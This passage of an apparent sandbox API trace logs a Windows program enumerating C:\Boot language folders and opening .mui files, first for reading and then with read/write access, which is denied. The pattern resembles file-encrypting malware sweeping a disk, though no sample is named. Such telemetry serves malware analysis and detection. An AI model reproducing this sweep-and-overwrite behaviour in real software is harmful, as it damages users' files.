InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.251] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.252] AreFileApisANSI () returned 1 [0070.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.252] AreFileApisANSI () returned 1 [0070.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 30 [0070.252] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.253] GetFileType (hFile=0x41c) returned 0x1 [0070.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.253] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.253] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.253] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.253] CloseHandle (hObject=0x41c) returned 1 [0070.253] AreFileApisANSI () returned 1 [0070.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\memtest.exe.mui") returned 30 [0070.253] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.254] GetLastError () returned 0x5 [0070.254] GetLastError () returned 0x5 [0070.254] SetLastError (dwErrCode=0x5) [0070.254] GetLastError () returned 0x5 [0070.254] SetLastError (dwErrCode=0x5) [0070.254] GetLastError () returned 0x5 [0070.254] SetLastError (dwErrCode=0x5) [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.254] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ꞙ")) returned 0 [0070.254] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0070.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0070.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.255] AreFileApisANSI () returned 1 [0070.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR", lpUsedDefaultChar=0x0) returned 14 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.255] AreFileApisANSI () returned 1 [0070.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88450 [0070.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88450, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ko-KR") returned 14 [0070.255] CreateFileW (lpFileName="C:\\Boot\\ko-KR" (normalized: "c:\\boot\\ko-kr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.255] GetLastError () returned 0x5 [0070.255] GetLastError () returned 0x5 [0070.255] SetLastError (dwErrCode=0x5) [0070.256] GetLastError () returned 0x5 [0070.256] SetLastError (dwErrCode=0x5) [0070.256] GetLastError () returned 0x5 [0070.256] SetLastError (dwErrCode=0x5) [0070.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.256] AreFileApisANSI () returned 1 [0070.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88428 [0070.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88428, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ko-KR") returned 14 [0070.256] CreateFileW (lpFileName="C:\\Boot\\ko-KR" (normalized: "c:\\boot\\ko-kr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.256] GetLastError () returned 0x5 [0070.256] GetLastError () returned 0x5 [0070.256] SetLastError (dwErrCode=0x5) [0070.256] GetLastError () returned 0x5 [0070.256] SetLastError (dwErrCode=0x5) [0070.256] GetLastError () returned 0x5 [0070.256] SetLastError (dwErrCode=0x5) [0070.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.256] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.257] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0070.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.257] FindFirstFileExW (in: lpFileName="C:\\Boot\\ko-KR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0070.259] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.259] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.260] AreFileApisANSI () returned 1 [0070.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0070.260] AreFileApisANSI () returned 1 [0070.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0070.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0070.260] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.261] GetFileType (hFile=0x41c) returned 0x1 [0070.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.261] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.261] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.261] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.261] CloseHandle (hObject=0x41c) returned 1 [0070.261] AreFileApisANSI () returned 1 [0070.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 30 [0070.262] CreateFileW 